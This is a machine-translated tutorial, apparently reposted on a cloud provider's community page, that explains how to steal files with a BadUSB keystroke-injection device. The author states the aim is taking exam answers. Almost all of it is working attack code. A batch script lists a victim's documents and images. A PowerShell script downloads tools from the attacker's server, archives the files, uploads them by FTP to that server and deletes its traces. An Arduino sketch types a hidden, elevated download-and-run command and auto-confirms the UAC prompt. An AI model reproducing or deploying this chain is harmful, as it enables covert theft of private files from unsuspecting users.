HID Advanced Attack posture: How to Use PowerShell scripts to steal files

Source: Internet
Author: User

HID Advanced Attack posture: How to Use PowerShell scripts to steal files

 


 

0 × 01 Introduction

After the mid-term exam, I had to steal the answer again. I found that the method of remote download and run exe is not very good and it is easy to report viruses. So I plan to use the ps script here.

0 × 02 about HID

HID is short for Human Interface Device. Its name indicates that a HID Device is a Device that interacts directly with people, such as a keyboard, mouse, or game lever. However, human and machine interfaces are not required for HID devices, as long as all devices that comply with the HID category specifications are HID devices. Generally, attacks against HID are mainly concentrated on the keyboard and mouse, because as long as the user's keyboard is controlled, the user's computer is basically controlled. Attackers can hide the attack in a normal mouse or keyboard. When a user inserts a mouse or keyboard containing an attack vector into a computer, the malicious code is loaded and executed.

0 × 03 preparation tools

An Internet host (you can use a computer to connect to a network cable for broadband dialing)

A hid attack tool (roast goose or Badusb)

FTPserver (build an FTP server to receive stolen files)

PHPstudy (set up an http server to store ps scripts, etc)

7z.exe/7z. dll (stored on the http server and then compressed and uploaded to reduce the upload speed as much as possible)

Code Section 0 × 04 (the following code may be offensive and should not be used for illegal purposes)

1. [get. bat] (obtain the desired file storage location and save it to c: \ temp. bat) [this code is stored in the http root directory of the server]

 

dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.batdir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat

2. [get. ps1] (clear running records and download 7z from the server. dll/7z.exe/get. bat to drive c to the corresponding location and process c: \ temp. bat is 7z compressed to c: \ Ram.7z. Upload c: \ Ram.7z to the FTP server root directory and delete all downloaded files !!! A total of four IP addresses need to be changed !!!) [This code is stored in the http root directory of the server. Remember to set the FTP server password to admin.]

 

 

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');

C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;

$fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");

$ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)

$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile

$ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")

$ftp.UseBinary = $true

$ftp.UsePassive = $true

$content = [System.IO.File]::ReadAllBytes($fileInf.fullname)

$ftp.ContentLength = $content.Length

$rs = $ftp.GetRequestStream()

$rs.Write($content, 0, $content.Length)

$rs.Close()

$rs.Dispose()

Remove-Item c:\temp.bat

Remove-Item c:\Ram.*

Remove-Item c:\7z.*

Remove-Item c:\Users\Public\get.*

3. [get. ino] (download get. ps1 as an administrator to the local c: \ users \ public directory !!! You need to change the IP address of 1 !!! After the UAC flash, remember to unplug it.) [directly refresh the IP address after modification]

 

 

Void setup () {// Initialization

Keyboard. begin (); // start Keyboard Communication

Delay (5000); // latency

Keyboard. press (KEY_LEFT_GUI); // win key

  delay(500); 

Keyboard. press ('R'); // r key

  delay(500); 

  Keyboard.release(KEY_LEFT_GUI);

  Keyboard.release('r');

  Keyboard.press(KEY_CAPS_LOCK);

  Keyboard.release(KEY_CAPS_LOCK);

  delay(500); 

  Keyboard.println("POWERSHELL -NOP");

  delay(800);

  Keyboard.println();

  delay(800);

  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");

  Keyboard.press(KEY_CAPS_LOCK);

  Keyboard.release(KEY_CAPS_LOCK);

Keyboard. end (); // ends the Keyboard Communication

}

Void loop () // loop

{

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.press(KEY_LEFT_ALT);

  Keyboard.print('y');

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.release(KEY_LEFT_ALT);

  delay(50);

}

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.